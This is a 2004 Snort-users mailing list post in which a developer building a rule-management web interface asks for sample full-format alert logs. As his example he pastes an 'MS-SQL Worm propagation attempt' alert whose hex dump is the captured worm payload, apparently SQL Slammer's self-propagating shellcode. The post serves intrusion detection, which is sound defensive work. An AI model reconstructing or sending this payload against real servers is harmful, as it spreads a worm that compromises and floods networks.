Snort mailing list archives
Search examples of alert_full
From: Guillaume Rix <Guillaume.Rix () Sun COM>
Date: Tue, 12 Oct 2004 11:56:31 +0200
Hi, I search an exemple of each snort signature in the following log format (header + payload) : [**] MS-SQL Worm propagation attempt [**] 10/09/04-00:30:43.255016 72:A9:20:0:1:0 -> 1:0:1:0:0:0type:0x800 len:0x1A2 200.121.5.101:1806 -> 62.34.163.248:1434 UDP TTL:118 TOS:0x0 ID:46681 IpLen:20 DgmLen:404 Len: 376 04 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................ 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................ 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................ 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................ 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................ 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................ 01 DC C9 B0 42 EB 0E 01 01 01 01 01 01 01 70 AE ....B.........p. 42 01 70 AE 42 90 90 90 90 90 90 90 90 68 DC C9 B.p.B........h.. B0 42 B8 01 01 01 01 31 C9 B1 18 50 E2 FD 35 01 .B.....1...P..5. 01 01 05 50 89 E5 51 68 2E 64 6C 6C 68 65 6C 33 ...P..Qh.dllhel3 32 68 6B 65 72 6E 51 68 6F 75 6E 74 68 69 63 6B 2hkernQhounthick 43 68 47 65 74 54 66 B9 6C 6C 51 68 33 32 2E 64 ChGetTf.llQh32.d 68 77 73 32 5F 66 B9 65 74 51 68 73 6F 63 6B 66 hws2_f.etQhsjkso B9 74 6F 51 68 73 65 6E 64 BE 18 10 AE 42 8D 45 ckoQhsend....B.E D4 50 FF 16 50 8D 45 E0 50 8D 45 F0 50 FF 16 50 .P..P.E.P.E.P..P BE 10 10 AE 42 8B 1E 8B 03 3D 55 8B EC 51 74 05 ....B....=U..Qt. BE 1C 10 AE 42 FF 16 FF D0 31 C9 51 51 50 81 F1 ....B....1.QQP.. 03 01 04 9B 81 F1 01 01 01 01 51 8D 45 CC 50 8B ..........Q.E.P. 45 C0 50 FF 16 6A 11 6A 02 6A 02 FF D0 50 8D 45 E.P..j.j.j...P.E C4 50 8B 45 C0 50 FF 16 89 C6 09 DB 81 F3 3C 61 .P.E.P........<a D9 FF 8B 45 B4 8D 0C 40 8D 14 88 C1 E2 04 01 C2 ...E...@........ C1 E2 08 29 C2 8D 04 90 01 D8 89 45 B4 6A 10 8D ...).......E.j.. 45 B0 50 31 C9 51 66 81 F1 78 01 51 8D 45 03 50 E.P1.Qf..x.Q.E.P 8B 45 AC 50 FF D6 EB CA .E.P.... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ I am making a web interface for delete, create, modify, test, compare and other actions on snort rules. If you could help me with extracts of this format logs, it will be very appreciated. Guillaume ------------------------------------------------------- This SF.net email is sponsored by: IT Product Guide on ITManagersJournal Use IT products in your business? Tell us what you think of them. Give us Your Opinions, Get Free ThinkGeek Gift Certificates! Click to find out more http://productguide.itmanagersjournal.com/guidepromo.tmpl _______________________________________________ Snort-users mailing list Snort-users () lists sourceforge net Go to this URL to change user options or unsubscribe: https://lists.sourceforge.net/lists/listinfo/snort-users Snort-users list archive: http://www.geocrawler.com/redir-sf.php3?list=snort-users
Current thread:
- Search examples of alert_full Guillaume Rix (Oct 12)